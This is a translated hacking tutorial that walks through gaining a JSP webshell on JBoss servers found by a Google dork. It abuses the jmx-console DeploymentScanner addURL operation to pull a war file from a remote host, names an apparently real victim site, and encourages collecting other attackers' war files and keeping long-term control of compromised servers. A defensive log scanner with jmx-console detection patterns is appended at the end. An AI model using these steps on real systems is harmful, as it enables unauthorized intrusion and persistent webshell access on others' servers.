JBoss is a large-scale application platform that ordinary users rarely get to know, and the harder something is to understand, the more advanced it tends to be. I borrowed a sentence from the Beijing bus driver Li Suli: "The only way to do what you are competent at is to do what you are competent at." The same holds for security: although the JBoss platform is hard to master, once we find the door into JBoss, penetration becomes easy. In this article we will learn how to obtain a JBoss Webshell by exploiting a JBoss vulnerability. The research itself starts here.
I. Information Collection and Collation
1. Search by vulnerability features
One notable feature of the whole class of JBoss vulnerabilities is the path "8080/jmx-console/". There are other features, of course, but this one is mainly used to make searching in Google convenient. Google's current search address is www.google.com.hk, which is not as effective as Google proper. In the Google input box, enter inurl:"8080/jmx-console/" and a large number of results come back.
2. Visit the website and test the vulnerability
Go through the search records one by one and check whether each site can still be accessed. Because of the timeliness of the search engine, some websites appear in the results but are no longer reachable for various reasons; if a website cannot be accessed normally, discard it. From the results we found that http://oa.tsingtaobeer-sales.com:8080/jmx-console/ was accessible. On that page, search for "jboss.deployment", find the entry "flavor=URL,type=DeploymentScanner", and click the link to check whether it opens normally, as shown in Figure 1.
Figure 1 JBoss test page
3. Add the war file address of Webshell
Compress the JSP shell into a war file and upload the war to a web site reachable from the Internet. In this example, the real address of the war is http://www.cam*****.com.hk/forum/forumdata/cache/war.war. The current page address is http://oa.tsingtaobeer-sales.com:8080/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL. On this page, find the "void addURL()" operation, enter the war address at http://www.cam***** as its parameter and invoke it, as shown in Figure 2. After the deployment succeeds, a prompt is displayed, as shown in Figure 3.
Figure 2 use the addURL function to download and deploy the war File
Figure 3 operation successful
4. Apply modifications to make the settings take effect
Return to the main interface, as shown in Figure 4. In URLList you will see the war address you just added; click "Apply Changes" to make the setting take effect.
Figure 4 apply changes to make the settings take effect
5. Enrich the "weapons inventory"
Looking at URLList, you will find that the list holds the addresses of deployed wars. If, after the previous steps, only your own address is in URLList, congratulations: you are the first to get this server. Once you have the server's permissions you can escalate privileges and harden it, and after hardening the server can be "maintained" and used for a long time. In this example, copy the values in URLList into Notepad and sort them out. My goodness, there were 26 war files. The war address list is as follows:
Access these addresses in turn. A simpler way is to copy the addresses, paste them into FlashGet and download them all at once. Although some of the war files at these addresses cannot be downloaded, sorting out and analyzing the downloaded ones yields four useful war files. During the test the author deployed these war files and, after several rounds of hard work, successfully got the obtained war files working. Put these useful war files into the weapons warehouse to enrich the ammunition!
6. Obtain Webshell
Enter the address "http://oa.tsingtaobeer-sales.com:8080/war" in the browser to test whether the Webshell can be accessed normally; as Figure 5 shows, the familiar JSP Webshell page appears. Note that the war file name and the web path may differ at deployment time, so the access address may vary slightly and more tests are needed: on some sites the shell can be accessed directly, on others the war package name must be appended. For details of obtaining JBoss, you can go to www.antian365.com and watch the JBoss Webshell video.
Figure 5 obtain Webshell
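A defender-side check added here, not code from the article: a small access-log scanner that flags any request reaching the jmx-console and, when an invokeOp against the DeploymentScanner MBean carries a URL argument, extracts the remote war address so it can be blocked and investigated. The log lines are constructed samples, and the methodIndex/arg0 parameter names are assumed from the console's HTML form rather than taken from the article.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined access-log format (not from the article).
SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2011:10:01:02 +0800] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2011:10:01:15 +0800] "GET /jmx-console/ HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2011:10:01:40 +0800] "GET /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2011:10:02:05 +0800] "GET /jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.deployment%3Atype%3DDeploymentScanner%2Cflavor%3DURL&methodIndex=17&arg0=http%3A%2F%2Fexample.invalid%2Fwar.war HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2011:10:02:30 +0800] "POST /jmx-console/HtmlAdaptor HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2011:10:02:40 +0800] "GET /war/cmd.jsp?cmd=id HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def classify(line):
    """Return (severity, details) for one log line, or None if not console-related."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if not parts.path.lower().startswith("/jmx-console"):
        return None
    qs = parse_qs(parts.query)
    mbean = qs.get("name", [""])[0]
    details = {"ip": m.group("ip"), "ts": m.group("ts"), "mbean": mbean, "remote_urls": []}
    if qs.get("action", [""])[0] == "invokeOp":
        # Operation arguments arrive as arg0, arg1, ... (assumed names); a URL among
        # them is the archive the DeploymentScanner would fetch and deploy.
        details["remote_urls"] = [v for k, vs in qs.items() if k.startswith("arg")
                                  for v in vs if v.startswith(("http://", "https://"))]
        if "DeploymentScanner" in mbean or details["remote_urls"]:
            return ("critical", details)
        return ("high", details)
    if m.group("method") == "POST":
        # The console's own forms POST their parameters in the body, which the
        # access log does not record, so any POST to the adaptor is suspicious.
        return ("high", details)
    # Any reachable console is already a finding: it should not face the Internet.
    return ("medium", details)

def scan(log_text):
    """Run classify() over every line and return the non-benign hits in order."""
    return [hit for hit in map(classify, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for severity, details in scan(SAMPLE_LOG):
        print(severity, details["ip"], details["mbean"] or "-", details["remote_urls"])
```

Restricting /jmx-console to an authenticated, internal-only role in the console's web.xml removes the finding at its source; the scanner is for spotting exposure and past deployments after the fact.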